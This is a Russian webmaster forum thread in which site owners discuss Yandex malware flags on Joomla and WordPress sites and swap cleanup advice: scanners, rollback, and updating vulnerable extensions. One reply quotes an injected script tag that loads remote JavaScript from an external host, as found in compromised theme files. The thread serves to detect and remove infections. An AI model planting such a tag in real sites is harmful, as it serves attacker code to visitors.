- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
ТС обычно яндекс ставит метку правильно, внешний вирус можете не увидеть, например он может показываться раз в сутки, проверьте шаблон корневые файлы сайта.
Если сами не справитесь стучите проверим сайт на вирусы + дадим рекомендации!
я ж там написал, что не вирус (да и по версии яндекса не вирус)- там накрутка поведенческих...
Не знаю зачем она поиск по сайту ввиде ссылки оформила- получается что по ее сайту с этой страници всегда ищут люди одну и ту-же фразу
самый простой способ добавить сайт в гугле панель вебмастера
и все вредоносные коды вы увидеть как на ладони
У меня такая же штука была. Очень успешно использовал Kaspersky Virus Removal Tool. Определил всю грязь и вычистил ее. Рекомендую. К тому же это бесплатно.
Сайт на Джумле? У вас скорее всего заражены .js файлы на хостинге через дыру :) Ну а дальше дело техники подгружать iframe.
Вот еще одна хрень, за которую Я звездочку ставит
<script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script><script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script>
Находится обычно wp-includes/functions.php и в header.php
Как бороться? Шеллов нигдеинет, хостинги разные. Приходится с айболитом вместе сидеть, но он много не видит. Как он прописывает этот скрипт, если права 444 стоят??
http://viju.tvercity.net/ru/weblog/removing-mallware-5-apr-2012
Читаем.
Долго не копался - но я так понял - что подобран пароль по фтп у вас и заменен код в js скрипте. Отсюда и ваши 444 не играют роль.
В таком случае - переписан был индексный файн php - и вместо сайта у вас редирект бы стоял на что нить hacked by... Если такого нет - нужно просмотреть index.php - если он по умолчанию - и проверить строки с началом на echo - а дальше в коде ссылка на какой нить сайт. http://*** (этот код вызывал был js скрипт с другого сайта, который бы и приводил в действие вышеупомянутый iframe) - просто тупо ее удалить.
Посмотрите последние даты изменения файлов сайта (php, js)- если даты недавние и в одно и тоже время - сделайте через хостинг-провайдера откат на дату раньше. Базу Mysql можно скопировать на состояние сегодняшнего дня. Потом по восстановлению файлов CMS - восстановить все данные уже на рабочий движок.
Скорее всего и htaccess заражен и скрипт стоит, который эту заразу будет постоянно распространять... Ищите кого-то, кто почистит сайт... У меня такое было сразу на 10 сайтов... За 100 долларов мне почистили...
На прошлой неделе Яндекс стал кричать что обнаружен вирус на одной из страниц моего сайта с вердиктом - поведенческий анализ:
http://haircolor.org.ua/texniki/item/145-okrashivanie-ombre.html
Это наиболее посещаемая страница из второстепенных. Посещаемость естественно упала с яши. Я проверила код и не нашла вроде ничего нового. Но я php и html знаю не очень.
Сделала проверку сайта на antivirus-alarm.ru
В результатах обнаружено только: VIPRE Malware.JS.Generic (JS). Все остальные базы молчат.
http://antivirus-alarm.ru/proverka/?url=haircolor.org.ua%2Ftexniki%2Fitem%2F145-okrashivanie-ombre.html
Проверка через http://2ip.ru/site-virus-scaner/ показывает подозрение на вирус из-за фрем вставки. Единственный фрейм который я обнаружила в коде - это фрейм плеера, который воспроизводить видео с ютуб. Что вирусом не является.
Заказала повторную проверку в яндексе. Она через 2 дня сняла информацию о вирусе, но стона через 3 дня она появилась. С той же страницей.
С гуглом все в порядке, а вот с Яшей что делать не знаю.
Подскажите в чем может быть проблема и как ее решить?
Добро пожаловать на борт: http://joomlaforum.ru/index.php/topic,258717.0.html
Вкратце. У Вас на сайте вредоносный код в js файлах. Легко найти по ключу: /*214afaae*/. Код постоянно меняется, может сам исчезать, потом появляться снова, но эта метка постоянная. Удалив все закладки кода, Вы на какое-то время избавитесь от метки Яндекса, но не от вируса. Сам код вируса где-то в php файле. Заливают предположительно через старые версии JCE и NoNamber. Их нужно обновить до актуальных. Там тема с пометкой "решено", хотя проблема не решена.
Да, и проверяйте все сайты на аккаунте, если их несколько. Зараза расползается по всем папакам на хостинге.
Добро пожаловать на борт: http://joomlaforum.ru/index.php/topic,258717.0.html
Вкратце. У Вас на сайте вредоносный код в js файлах. Легко найти по ключу: /*214afaae*/. Код постоянно меняется, может сам исчезать, потом появляться снова, но эта метка постоянная. Удалив все закладки кода, Вы на какое-то время избавитесь от метки Яндекса, но не от вируса. Сам код вируса где-то в php файле. Заливают предположительно через старые версии JCE и NoNamber. Их нужно обновить до актуальных. Там тема с пометкой "решено", хотя проблема не решена.
Да, и проверяйте все сайты на аккаунте, если их несколько. Зараза расползается по всем папакам на хостинге.
Аналогично были заражены все сайты на аккаунте. Вроде победил заразу. Вначале грохнул вышеупомянутые плагины/модули. Айболитом выявил все подозрительные файлы по типу 87328a.php, удалил. И затем скриптом far.php вычистил все js файлы от вредоносного кода
и не забыть обновить модули/CMS до последней версии